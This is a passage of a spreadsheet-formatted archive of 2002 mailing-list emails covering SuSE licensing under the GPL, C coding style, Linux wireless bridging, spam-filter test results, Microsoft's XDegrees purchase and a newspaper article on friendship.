&gt; GPL gives you the right to get covered software &gt; for free.  It does not.   All I want is the OS and GNU apps. I was under the impression that for *_those_* all one needed was to pay for the media and not for the code itself? Ai-je tort? &gt; It provides that _if_ you've lawfully received &gt; a copy of the covered binary version, you have &gt; rights to also receive the matching source code. My understanding was that binaries or whatever could be received for the cost of the media plus a token of one's appreciation (the latter being subject to agreement between the parties) - I was offering a bottle of wine plus maybe a pint or two and a chat for a copy - I don't know what the going rate is. If I wanted support from SuSE, that would be a different issue, and one for which I would be willing to pay.   &gt; &gt; I don't particularly need support, so I'm  &gt; &gt; no really interested in purchasing a set of  &gt; &gt; disks with 4 billion apps which I'll never use. &gt; Then, if you nonetheless want a SuSE boxed set's &gt; contents, the only way you can do that without &gt; copyright violation _and_ without having to pay &gt; the purchase price is to get someone to _give_  &gt; (not "lend" or duplicate) you his copy. I have a friend with 7.3 - I think that I'll end up doing that! Seems to me to go against the spirit of the GPL though. &gt; &gt; Yes, thanks for your input. Anyway, I've a  &gt; &gt; friend with 7.3 pro, so I'll just ask him. &gt; Ask him _what_?  If you're asking him to "lend" or &gt; duplicate his CDs, then you'll be ripping off SuSE &gt; Linux AG illegally. I have now realised this, thanks to your kind explanations. I can borrow them, but not  copy them? That's fine - IMHO, it goes against the spirit of the GPL though.   &gt; Don't like SuSE's product licensing?  Write your  &gt; own distribution.   And why not my own OS, while I'm at it? &gt; You can even grab most of what you need  &gt; _from SuSE_.  All you have to do is heed the &gt; licensing terms on the individual pieces. And, as I've tried to explain, is not the licence terms on, say, trials for commercial company x to which I object, it is the way SuSE appears,  at least to my I.T. peasant self, to have mixed up proprietary and open stuff.   &gt; What, you think that's too much work?  Then,  &gt; try a different distribution. Hence my "To hell with SuSE" post... &gt; Clue: _Not_ one packaged in a retail &gt; boxed set.  Even RH 7.3 retail boxed sets include &gt; non-freely redistributable applications on &gt; the Star office 5.2 CD and the Productivity &gt; Applications CD, among others. And I have no problem with people sticking trial editions along with GPL'ed stuff. Why you  can't pass those on though, is beyond me. Paul... ___________________________________________________________ Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franais ! Yahoo! Mail : [URL]http://fr.mail.yahoo.com[/URL] --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Nick Murtagh &lt;nickm@go2.ie&gt;\nFrom: Kenn Humborg &lt;kenn@linux.ie&gt;\nDate: Tue, 13 Aug 2002 01:23:46 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 01:23:46 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] slashdot EW Dijkstra humor</t>
  </si>
  <si>
    <t>On Mon, Aug 12, 2002 at 08:05:58PM +0100, Nick Murtagh wrote:\n&gt; On Mon, 2002-08-12 at 19:56, Kenn Humborg wrote:\n&gt; &gt; Well, you should consider 'break' inside a 'select' statement\n&gt; &gt; to be part of the syntax, rather than a control flow modifier.\n&gt; \n&gt; Why? When it comes down to the assembly level, it gets turned\n&gt; into some kind of jump instruction. Should I pretend I don't know\n&gt; this when I'm programming?\n\nI know that.  And no, you shouldn't.  But see below.\n\n&gt; &gt; A _mandatory_ part of the syntax, at that.\n&gt; \n&gt; It's not mandatory. You can leave out the break, and the flow\n&gt; of control will continue to the next case. Which can be useful\n&gt; in certain circumstances.\n\nI know that, too.\n\nHowever, the discussion was tending towards\n"don't use things like goto and break to alter flow of control\nin your program".  While not valid 100% of the time, it's a \nreasonable rule of thumb.  The idea is that, when looking at\ncode, it's easier to see how control moves through a \nfunction if your basic control blocks do all the work.  The\nspecific example of replacing a break in a while loop with\na modified while() expression shows this.  You only have to\nlook in one place to see when you'll run off the end of the\nloop, not hunt through the whole loop.  (Although that particular\nexample wasn't really that good, since the extra test was \nadding on (... || done) and setting done = true in the loop.\nWhich is much the same as a break really.)\n\nThe idea is to surprise the next programmer as little as \npossible when he sees the code.\n\nIn a similar vein, having a break in every case of a select\nblock makes the flow much clearer.  Flow goes in, zero or \none case blocks are executed and flows comes out the bottom.\nLeaving out break statements breaks this assumption.\n\nMy point is that, while there are a few situations where it\nmakes sense to leave out the breaks, I usually tend to \nconsider the break at the end of each case more like the\nbrace at the end of the while block.  \n\nIn fact, maybe it wouldn't have been a bad idea if the language\nwas designed such that the continue statement meant fall through\nand break wasn't needed:\n\n   select (x) {\n      case 1:\n         /* do something - doesn't fall through */\n      case 2:\n         /* do something - falls through to next case*/\n         continue;\n      case 3:\n         /* do something - doesn't fall through */\n      default:\n         /* do something - doesn't fall through */\n   }\n\nStill, hindsight and all that.  Sigh.\n\nLater,\nKenn\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: melbwireless@wireless.org.au\nFrom: "Vincent Chin" &lt;nukiez@hotmail.com&gt;\nDate: Tue, 13 Aug 2002 01:23:40 +1000</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 01:23:40 +1000</t>
  </si>
  <si>
    <t>"Vincent Chin" &lt;nukiez@hotmail.com&gt;</t>
  </si>
  <si>
    <t>melbwireless@wireless.org.au</t>
  </si>
  <si>
    <t>Ripped from [URL]http://www.hpl.hp.com[/URL] " 11 Access Points, Home Gateways and Ethernet bridging Most Access Points act as a MAC level bridge, allowing the Wireless LAN to  be a natural extension of a wired network. They are deployed in a cellular  fashion, and provide extended security, management and roaming. On the other hand, the Home Gateways allow a single cell to be connected to  a WAN, like a modem, a cable modem or a DSL access. The set of features is  quite different, and they offer NAT/masquerading and PPP configuration. The conventional Ethernet bridging method (promiscuous sniffing) doesn't  work with most wireless LAN standard, because of the header encapsulation  and the interactions with link layer retransmissions. In other word, most  often, when you use a software bridge on a wireless LAN (such as the Linux  bridge on a 802.11 card), it doesn't work (moreover, quite often promiscuous  is broken as well). " [[ What the?? What is he talking about?? Aren't we all using Linux to bridge  our networks? ]] " The driver could work around this restriction by creating its own MAC  headers (802.11 headers instead of 802.3, and putting the right bits in the  right place), but in fact most vendors don't provide the specification on  how to this with their hardware (when they don't explicitely prevent it in  hardware, to force you to buy their Access Points). In other words, don't expect to use your Linux PC as a wireless bridge or  wireless Access Points with most products out there, and forget about  turning it into an Access Point. Of course, there is some exceptions. " [[ Is this true? ]] " The workaround is to set the wireless LAN in ad-hoc mode and to use other  methods, such as routing, masquerading, IP bridging, ARP proxying... " [[ Yes, I am in a process of building a wireless-lan &lt;-&gt; wired-lan bridge.  But I don't understand what this guy is talking about. Anyone? Vince. ]] _________________________________________________________________ MSN Photos is the easiest way to share and print your photos:  [URL]http://photos.msn.com[/URL] To unsubscribe: send mail to majordomo@wireless.org.au with "unsubscribe melbwireless" in the body of the message</t>
  </si>
  <si>
    <t>http://www.hpl.hp.com http://photos.msn.com</t>
  </si>
  <si>
    <t>To: &lt;gojomo@usa.net&gt;\nFrom: "Damien Morton" &lt;damien.morton@acm.org&gt;\nDate: Tue, 13 Aug 2002 00:56:43 -0400</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 00:56:43 -0400</t>
  </si>
  <si>
    <t>"Damien Morton" &lt;damien.morton@acm.org&gt;</t>
  </si>
  <si>
    <t>&lt;gojomo@usa.net&gt;</t>
  </si>
  <si>
    <t>NYTimes.com Article: Bigger Bar Code Inches Up on Retailers</t>
  </si>
  <si>
    <t>How about a highly error corrected atomic level 3D encoding scheme that\nrelies on shape, colour and chemical make up to uniquely identify every\nobject in the universe.\n\nObjects uniquely identify themselves - theres no need for barcodes.\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "wintermute" &lt;cout@eircom.net&gt;\nDate: Tue, 13 Aug 2002 00:48:18 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 00:48:18 +0100</t>
  </si>
  <si>
    <t>Rick Moen  wrote: &gt; Don't like SuSE's product licensing?  Write your own distribution.  You &gt; can even grab most of what you need _from SuSE_.  All you have to do is  &gt; heed the licensing terms on the individual pieces. How unimaginably difficult is this to do? There are as far as I know, no Linux kernel hackers, nor distros that originate from this fair island right? Right. Yes it might be very,very difficult and subject to abject failure  in sticking together a distro.... call it Dolmen Linux (or other),  no doubt the packaging system would be one of the first places  such a suggestion would stumble. Some (like me) favouring a FreeBSD style ports system others favouring  a Debian style system and others still favouring *rpm style packaging. That said other *LUG have done interesting things like making blackbox. Perhaps making a distro would be ..... umm.... fun. Just a pseudo random thought. I'm only laughing on the outside  My smile is just skin deep  If you could see inside I'm really crying  You might join me for a weep. &lt;&gt; --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: nan\nFrom: tim.one@comcast.net (Tim Peters)\nDate: Tue, 10 Sep 2002 23:46:15 -0400</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 23:46:15 -0400</t>
  </si>
  <si>
    <t>tim.one@comcast.net (Tim Peters)</t>
  </si>
  <si>
    <t>[Tim] &gt; ... &gt; At the other extreme, training on half my ham&amp;spam, and scoring aginst &gt; the other half &gt; ... &gt;     false positive rate: 0.0100% &gt;     false negative rate: 0.3636% &gt; ... &gt; Alas, all 4 of the 0.99 clues there are HTML-related. That begged to try it again but with Tokenize/retain_pure_html_tags false. The random halves getting trained on and scored against are different here, and I repaired the bug that dropped 1 ham and 1 spam on the floor, so this isn't exactly a 1-change difference between runs. Ham distribution for all runs: * = 167 items   0.00 9999 ************************************************************  10.00    0  20.00    0  30.00    0  40.00    0  50.00    0  60.00    0  70.00    0  80.00    0  90.00    1 * Spam distribution for all runs: * = 115 items   0.00   21 *  10.00    0  20.00    0  30.00    1 *  40.00    0  50.00    0  60.00    1 *  70.00    0  80.00    1 *  90.00 6852 ************************************************************     false positive rate: 0.0100%     false negative rate: 0.3490% Yay!  That may mean that HTML tags aren't really needed in my test data provided it's trained on enough stuff.  Curiously, the sole false positive here is the same as the sole false positive on the halfÂ½ run reported in the preceding msg (I assume the Nigerian scam "false positive" just happened to end up in the training data both times): ************************************************************************ Data/Ham/Set4/107687.txt prob = 0.999632042904 prob('python.') = 0.01 prob('alteration') = 0.01 prob('edinburgh') = 0.01 prob('subject:Python') = 0.01 prob('header:Errors-To:1') = 0.0216278 prob('thanks,') = 0.0319955 prob('help?') = 0.041806 prob('road,') = 0.0462364 prob('there,') = 0.0722794 prob('us.') = 0.906609 prob('our') = 0.919118 prob('company,') = 0.921852 prob('visit') = 0.930785 prob('sent.') = 0.939882 prob('e-mail') = 0.949765 prob('courses') = 0.954726 prob('received') = 0.955209 prob('analyst') = 0.960756 prob('investment') = 0.975139 prob('regulated') = 0.99 prob('e-mails') = 0.99 prob('mills') = 0.99 Received: from [195.171.5.71] (helo=node401.dmz.standardlife.com)         by mail.python.org with esmtp (Exim 3.21 #1)         id 15rDsu-00085k-00         for python-list@python.org; Wed, 10 Oct 2001 03:34:32 -0400 Received: from slukdcn4.internal.standardlife.com (slukdcn4.standardlife.com         [10.3.2.72])         by node401.dmz.standardlife.com (Pro-8.9.3/Pro-8.9.3) with SMTP id         IAA53660for ; Wed, 10 Oct 2001 08:34:00 +0100 Received: from sl079320 ([172.31.88.231]) by         slukdcn4.internal.standardlife.com (Lotus SMTP MTA v4.6.6  (890.1 7-16-1999))         with SMTP id 80256AE1.00294B60; Wed, 10 Oct 2001 08:31:02 +0100 Message-ID: &lt;007e01c1515d$bb255940$e7581fac@sl079320.internal.standardlife.com&gt; From: "Vickie Mills"  To:  Subject: Training Courses in Python in UK Date: Wed, 10 Oct 2001 08:32:30 +0100 MIME-Version: 1.0 Content-Type: text/plain;         charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3155.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Sender: python-list-admin@python.org Errors-To: python-list-admin@python.org X-BeenThere: python-list@python.org X-Mailman-Version: 2.0.6 (101270) Precedence: bulk List-Help:  List-Post:  List-Subscribe: ,          List-Id: General discussion list for the Python programming language          List-Unsubscribe: ,          List-Archive:  Hi there, I am looking for you recommendations on training courses available in the UK on Python.  Can you help? Thanks, Vickie Mills IS Training Analyst Tel:    0131 245 1127 Fax:    0131 245 1550 E-mail:    vickie_mills@standardlife.com For more information on Standard Life, visit our website [URL]http://www.standardlife.com[/URL]   The Standard Life Assurance Company, Standard Life House, 30 Lothian Road, Edinburgh EH1 2DH, is registered in Scotland (No SZ4) and regulated by the Personal Investment Authority.  Tel: 0131 225 2552 - calls may be recorded or monitored.  This confidential e-mail is for the addressee only.  If received in error, do not retain/copy/disclose it without our consent and please return it to us.  We virus scan all e-mails but are not responsible for any damage caused by a virus or alteration by a third party after it is sent. ************************************************************************ The top 30 discriminators are more interesting now:         'income' 629 0.99         'http0:python' 643 0.01         'header:MiME-Version:1' 672 0.99         'http1:remove' 693 0.99         'content-type:text/html' 711 0.982345         'string' 714 0.01         'http&gt;1:jpg' 776 0.99         'object' 813 0.01         'python,' 852 0.01         'python.' 882 0.01         'language' 883 0.01         '&gt;&gt;&gt;' 907 0.01         'header:Return-Path:2' 907 0.99         'unsubscribe' 975 0.99         'header:Received:7' 1113 0.99         'def' 1142 0.01         'http&gt;1:gif' 1168 0.99         'module' 1169 0.01         'import' 1332 0.01         'header:Received:8' 1342 0.99         'header:Errors-To:1' 1377 0.0216278         'header:In-Reply-To:1' 1402 0.01         'wrote' 1753 0.01         'Â ' 2067 0.99         'subject:Python' 2140 0.01         'header:User-Agent:1' 2322 0.01         'header:X-Complaints-To:1' 4351 0.01         'wrote:' 4370 0.01         'python' 4972 0.01         'header:Organization:1' 6921 0.01 There are still two HTML clues remaining there ("Â " and "content-type:text/html").  Anthony's trick accounts for almost a third of these.  "Python" appears in 5 of them ('http0:python' means that 'python' was found in the 1st field of an embedded http:// URL).  Sticking a .gif or a .jpg in  a URL both score as 0.99 spam clues.  Note the damning pattern of capitalization in 'header:MiME-Version:1'!  This counting is case-sensitive, and nobody ever would have guessed that MiME is more damning than SUBJECT or DATE.  Why would spam be likely to end up with two instances of Return-Path in the headers?</t>
  </si>
  <si>
    <t>http://www.standardlife.com</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;\nDate: Tue, 10 Sep 2002 23:45:31 -0700</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 23:45:31 -0700</t>
  </si>
  <si>
    <t>Microsoft buys XDegress - more of a p2p/distributed data thing...</t>
  </si>
  <si>
    <t>I like this part - sounds like httpd on the client...\n\n[URL]http://www.openp2p.com[/URL]\n\n"Once the Client Component is installed, a server can order a program to run\non the client. Any CGI script, Java servlet, ASP component, etc. could be\nrun on the client. This is like breaking the Web server into two parts.\nOriginally, Web servers just understood HTTP and sent pages. Then the field\nstarted demanding more from the Web and the servers got loaded down with CGI\nand mod_perl and active pages and stuff. So now the Web server can choose to\ngo back to simple serving and (where the application is appropriate) let the\nclient do the other razzamatazz. This is superior to JavaScript in one\nimportant detail: the program doesn't have to reload when a new page is\nloaded, as JavaScript functions do.\n\nAnd because XDegrees uses Web-compatible technology, users can access\nXDegrees resources without installing any software, simply by using their\nbrowser."\n\n===\n"Scaling is the main question that comes to mind when somebody describes a\nnew naming and searching system. CEO Michael Tanne claims to have figured\nout mathematically that the system can scale up to millions of users and\nbillions of resources. Scaling is facilitated by the careful location of\nservers (XDegrees will colocate servers at key routing points, as Akamai\ndoes), and by directing clients to the nearest server as their default\n"home" server. Enterprise customers can use own servers to manage in-house\napplications."\n\n"Files can be cached on multiple systems randomly scattered around the\nInternet, as with Napster or Freenet. In fact, the caching in XDegrees is\nmore sophisticated than it is on those systems: users with high bandwidth\nconnections can download portions, or "stripes," of a file from several\ncached locations simultaneously. The XDegrees software then reassembles\nthese stripes into the whole file and uses digital signatures to verify that\nthe downloaded file is the same as the original. A key component of this\ndigital signature is a digest of the file, which is stored as an HTTP header\nfor the file."</t>
  </si>
  <si>
    <t>http://www.openp2p.com</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;\nDate: Tue, 10 Sep 2002 23:39:58 -0700</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 23:39:58 -0700</t>
  </si>
  <si>
    <t>Microsoft Buys XDegrees - Secure Access Company</t>
  </si>
  <si>
    <t>==\n[URL]http://siliconvalley.internet.com[/URL]\n\nMicrosoft Tuesday said it has purchased a Mountain View, Calif.-based\nsecurity company to better secure its core file services including its\nWindows platform and .NET initiative.\n\nThe Redmond, Wash-based software giant has acquired the assets of XDegrees\nfor an undisclosed amount of cash and is in the process of relocating the\nteam of 12 or 14 engineers to the Microsoft campus.\n\nXDegrees' technology assigns URLs to Word files, video clips, and other\ndigital documents for access across a peer-to-peer network\n\nXDegrees founder Michael Tanne was offered a job, but decided instead to\nplay his hand in the Silicon Valley.\n==========\n\n"XDegrees' technology assigns URLs to Word files, video clips, and other\ndigital documents for access across a peer-to-peer network" - assigns URLs\nto Word files... and somebody /bought/ that?\n\n===\n[URL]http://www.xdegrees.com[/URL]\n"The XDegrees System allows users to easily and consistently locate, access\nand manage information by assigning each document a unique link. Providing\nend-to-end security, the XDegrees System unifies authentication of all\nusers, provides file-level access control and encrypts all stored and\ntransferred files. Seamless integration with existing applications such as\nemail clients and Microsoft Office products allows companies to rapidly\ndeploy the XDegrees System and users to get up-and-running quickly."\n\nWhoa... high tech...\n\n===\nMore bits here...\n[URL]http://www.openp2p.com[/URL]\n\n"The essence of XDegrees consists of a naming system and a distributed\ndatabase that allows peers to resolve resource names. XDegrees manages these\nservices for customers on its own hosts, and sells its software to\nenterprises so they can define and run their own namespaces on in-house\nservers. You can search for a particular person (whatever device the person\nis currently using), for a particular device, for a file, or even for a web\nservice. The software that resolves resource names is called XRNS (the\neXtensible Resource Name System)."</t>
  </si>
  <si>
    <t>http://siliconvalley.internet.com http://www.xdegrees.com http://www.openp2p.com</t>
  </si>
  <si>
    <t>To: "Gary Lawrence Murphy" &lt;garym@canada.com&gt;,\nFrom: "Geege Schuman" &lt;geege@barrera.org&gt;\nDate: Tue, 10 Sep 2002 19:56:56 -0400</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 19:56:56 -0400</t>
  </si>
  <si>
    <t>"Gary Lawrence Murphy" &lt;garym@canada.com&gt;,</t>
  </si>
  <si>
    <t>RE: Recommended Viewing</t>
  </si>
  <si>
    <t>dreams-are-like-radio analogy: i program my Jetta Monsoon for Planet 93.3, 80's 102.9, and NPR 89.9 but when i leave my local broadcast range i have to scan for new stations. dreaming is outside my local broadcast range. -----Original Message----- From: garym@maya.dyndns.org [mailto:garym@maya.dyndns.org]On Behalf Of Gary Lawrence Murphy Sent: Tuesday, September 10, 2002 10:14 AM To: Geege Schuman Cc: johnhall@evergo.net; FoRK Subject: Re: Recommended Viewing &gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman  writes:     G&gt; you meant "SURPRISINGLY perceptive," didn't you?  :-) Of course, dear.  Especially without zazen training.  Veritably Operational Thetan-like.     G&gt; recent exceptionally vivid and strange dreams lead me to     G&gt; believe i'm sparking synapses that have lain dormant lo these     G&gt; many years.  Lots of problem solving going on up there at     G&gt; night. It's a myth that we don't use parts of our brain.  We use it all, always.  It's just that our culturally-induced focal-point causes most of us to most of the time ignore and waste 99.999% of it.  "Lucid" is a measure of notch-filter bandwidth; all stations are broadcasting, but we only /choose/ Easy Rock 105. For example, don't look now but your shoes are full of feet. The sensation of toes the above statement evokes is not a "turning on" of circuits, it is a "tuning in".  The next step, of course, is to "drop out" :) To paraphrase an old saw: Life is wasted on the living. -- Gary Lawrence Murphy  TeleDynamics Communications Inc  Business Advantage through Community Software : [URL]http://www.teledyn.com[/URL] "Computers are useless.  They can only give you answers."(Pablo Picasso)</t>
  </si>
  <si>
    <t>http://www.teledyn.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Tue, 10 Sep 2002 19:20:46 +0200</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 19:20:46 +0200</t>
  </si>
  <si>
    <t>Re: Holidays for freshrpms.net :-)</t>
  </si>
  <si>
    <t>Once upon a time, Chris wrote : &gt; On Tue, 2002-09-10 at 12:39, Matthias Saou wrote: &gt; &gt; Hi all, &gt; &gt;  &gt; &gt; I'll be leaving this evening until next Monday, with no access to &gt; &gt; whatsoever to a single computer until then, woohoo, real holidays! :-) &gt;  &gt; I don't think I could take it. The network was down for an hour here and &gt; I was climbing the walls. :) I can't stand it either when it's at work or home and I'd planned on doing something that required network access... but I really feel like I need a break now, away from work pressure that almost drove me nuts all summer! Ah, the joys of responsibilities... :-/ Six days without computers ahead, but six days driving my 600 Bandit roadster bike! I won't be miserable nor get bored, don't worry for me ;-) I also have the first Lord of the Rings book to finish (half way through now) and the two others to read... lots of "sane" and non-wired occupations ahead! Oh, did I mention beer drinking with friends? :-)))) Matthias (really happy to be on holidayyyy for the first time this year!)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Matthias Haase &lt;matthias_haase@bennewitz.com&gt;\nDate: Tue, 10 Sep 2002 19:02:02 +0200</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 19:02:02 +0200</t>
  </si>
  <si>
    <t>On Tue, 10 Sep 2002 18:39:07 +0200 Matthias Saou  wrote: &gt; Before going, I did repackage the latest hackedbox and lbreakout2 that &gt; both came out today. &gt;  &gt; Have fun! (I will!! ;-)) fun here too, recompiled gnome 2.02rc2 today ;-) Have a nice and good time! --  regards       Matthias _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: RPM-List &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Tue, 10 Sep 2002 18:39:07 +0200</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 18:39:07 +0200</t>
  </si>
  <si>
    <t>Holidays for freshrpms.net :-)</t>
  </si>
  <si>
    <t>Hi all, I'll be leaving this evening until next Monday, with no access to whatsoever to a single computer until then, woohoo, real holidays! :-) So don't be worried if there's a new release of  and that it's not updated quickly despite your many requests to the list ;-) Before going, I did repackage the latest hackedbox and lbreakout2 that both came out today. Have fun! (I will!!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exmh-users@spamassassin.taint.org\nFrom: Rick Baartman &lt;baartman@lin12.triumf.ca&gt;\nDate: Tue, 10 Sep 2002 16:54:38 -0700</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 16:54:38 -0700</t>
  </si>
  <si>
    <t>Rick Baartman &lt;baartman@lin12.triumf.ca&gt;</t>
  </si>
  <si>
    <t>Thanks Brent: now it's clearer (to me) what's needed. I've used the global sort and J C Lawrence's re-scan, but there is still a vulnerability there: If I have an instance of exmh running, the folder I'm visiting will have its new, correct .xmhcache overwritten with an incorrect one when I switch folders. I can cron the sort and re-scan process, but I should kill running exmh's first. Best would be to have a button for "Global sort and update all scan caches" in the exmh More... menu -- rick &gt;&gt;&gt;&gt;&gt; "Brent" == Brent Welch  &gt;&gt;&gt;&gt;&gt; wrote the following on Tue, 10 Sep 2002 14:31:48 -0700   Brent&gt; There is an "Update all scan caches" menu entry that rescans your   Brent&gt; folders similar to the short scripts folks have shared around.  It   Brent&gt; runs in the background. _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: James Gibbon &lt;james.gibbon@virgin.net&gt;\nDate: Tue, 10 Sep 2002 15:43:32 +0100</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 15:43:32 +0100</t>
  </si>
  <si>
    <t>James Gibbon &lt;james.gibbon@virgin.net&gt;</t>
  </si>
  <si>
    <t>Tom Reingold wrote:\n\n&gt; &gt; \n&gt; &gt; Ahh.  At work we fire people who use Outlook (Literally true:\n&gt; &gt; They get escorted to the door, their badge confiscated, and\n&gt; &gt; told to return the next day to collect their office contents).\n&gt; \n&gt; Why?  What threat does Outlook pose to your organization?\n&gt; \n\nIt has been described as "the technological equivalent of\nsoliciting blood transfusions from random strangers in the\nstreet".  In short - it's a virus magnet.\n\n\n\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: khare@alumni.caltech.edu\nDate: Tue, 10 Sep 2002 15:06:36 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 15:06:36 -0400 (EDT)</t>
  </si>
  <si>
    <t>NYTimes.com Article: Some Friends, Indeed, Do More Harm Than Good</t>
  </si>
  <si>
    <t>This article from NYTimes.com \nhas been sent to you by khare@alumni.caltech.edu.\n\n\nSure does explain FoRK :-)\n\nnot yet abandoned,\n  Rohit\n\nkhare@alumni.caltech.edu\n\n\nSome Friends, Indeed, Do More Harm Than Good\n\nSeptember 10, 2002\nBy MARY DUENWALD \n\n\n\n\n \n\nFriends are supposed to be good for you. In recent years,\nscientific research has suggested that people who have\nstrong friendships experience less stress, they recover\nmore quickly from heart attacks and they are likely to live\nlonger than the friendless. They are even less susceptible\nto the common cold, studies show. \n\nBut not all friends have such a salutary effect. Some lie,\ninsult and betray. Some are overly needy. Some give too\nmuch advice. Psychologists and sociologists are now calling\nattention to the negative health effects of bad friends. \n\n"Friendship is often very painful," said Dr. Harriet\nLerner, a psychologist and the author of "The Dance of\nConnection." "In a close, enduring friendship, jealousy,\nenvy, anger and the entire range of difficult emotions will\nrear their heads. One has to decide whether the best thing\nis to consider it a phase in a long friendship or say this\nis bad for my health and I'm disbanding it." \n\nAnother book, "When Friendship Hurts," by Dr. Jan Yager, a\nsociologist at the University of Connecticut at Stamford,\nadvises deliberately leaving bad friends by the wayside.\n"There's this myth that friendships should last a\nlifetime," Dr. Yager said. "But sometimes it's better that\nthey end." \n\nThat social scientists would wait until now to spotlight\nthe dangers of bad friends is understandable, considering\nthat they have only recently paid close attention to\nfriendship at all. Marriage and family relationships -\nbetween siblings or parents and children - have been seen\nas more important. \n\nOf course, troubled friendships are far less likely to lead\nto depression or suicide than troubled marriages are. And\nchildren are seldom seriously affected when friendships go\nbad. \n\nAs a popular author of relationship advice books, Dr.\nLerner said, "Never once have I had anyone write and say my\nbest friend hits me." \n\nDr. Beverley Fehr, a professor of psychology at the\nUniversity of Winnipeg, noted that sociological changes,\nlike a 50 percent divorce rate, have added weight to the\nrole of friends in emotional and physical health. \n\n"Now that a marital relationship can't be counted on for\nstability the way it was in the past, and because people\nare less likely to be living with or near extended family\nmembers, people are shifting their focus to friendships as\na way of building community and finding intimacy," said Dr.\nFehr, the author of "Friendship Processes." \n\nUntil the past couple of years, the research on friendship\nfocused on its health benefits. "Now we're starting to look\nat it as a more full relationship," said Dr. Suzanna Rose,\na professor of psychology at Florida International\nUniversity in Miami. "Like marriage, friendship also has\nnegative characteristics." \n\nThe research is in its infancy. Psychologists have not yet\nmeasured the ill effects of bad friendship, Dr. Fehr said.\nSo far they have only, through surveys and interviews,\nfigured out that it is a significant problem. The early\nresearch, Dr. Fehr added, is showing that betrayal by a\nfriend can be more devastating than experts had thought. \n\nHow can a friend be bad? Most obviously, Dr. Rose said, by\ndrawing a person into criminal or otherwise ill-advised\npursuit. "When you think of people who were friends at\nEnron," she added, "you can see how friendship can support\nantisocial behavior." \n\nBetrayal also makes for a bad friendship. "When friends\nsplit up," said Dr. Keith E. Davis, a professor of\npsychology at the University of South Carolina, "it is\noften in cases where one has shared personal information or\nsecrets that the other one wanted to be kept confidential."\n\n\nAnother form of betrayal, Dr. Yager said, is when a friend\nsuddenly turns cold, without ever explaining why. "It's\nmore than just pulling away," she said. "The silent\ntreatment is actually malicious." \n\nAt least as devastating is an affair with the friend's\nromantic partner, as recently happened to one of Dr.\nLerner's patients. "I would not encourage her to hang in\nthere and work this one out," Dr. Lerner said. \n\nA third type of bad friendship involves someone who insults\nthe other person, Dr. Yager said. One of the 180 people who\nresponded to Dr. Yager's most recent survey on friendship\ndescribed how, when she was 11, her best friend called her\n"a derogatory name." The woman, now 32, was so devastated\nthat she feels she has been unable to be fully open with\npeople ever since, Dr. Yager said. \n\nEmotional abuse may be less noticeable than verbal abuse,\nbut it is "more insidious," Dr. Yager said. "Some people\nconstantly set up their friends," she explained. "They'll\nhave a party, not invite the friend, but make sure he or\nshe finds out." \n\nRisk takers, betrayers and abusers are the most extreme\nkinds of bad friends, Dr. Yager said, but they are not the\nonly ones. She identifies 21 different varieties. Occupying\nthe second tier of badness are the liar, the person who is\noverly dependent, the friend who never listens, the person\nwho meddles too much in a friend's life, the competitor and\nthe loner, who prefers not to spend time with friends. \n\nMost common is the promise breaker. "This includes everyone\nfrom the person who says let's have a cup of coffee but\nsomething always comes up at the last minute to someone who\npromises to be there for you when you need them, but then\nisn't," Dr. Yager said. \n\nSome friendships go bad, as some romantic relationships do,\nwhen one of the people gradually or suddenly finds reasons\nto dislike the other one. \n\n"With couples, it can take 18 to 24 months for someone to\ndiscover there's something important they don't like about\nthe other person," said Dr. Rose of Florida International.\n"One might find, for example, that in subtle ways the other\nperson is a racist. In friendships, which are less intense,\nit may take even more time for one person to meet the\nother's dislike criteria." \n\nWhether a friendship is worth saving, Dr. Lerner said,\n"depends on how large the injury is." \n\n"Sometimes the mature thing is to lighten up and let\nsomething go," she added. "It's also an act of maturity\nsometimes to accept another person's limitations." \n\nAcceptance should 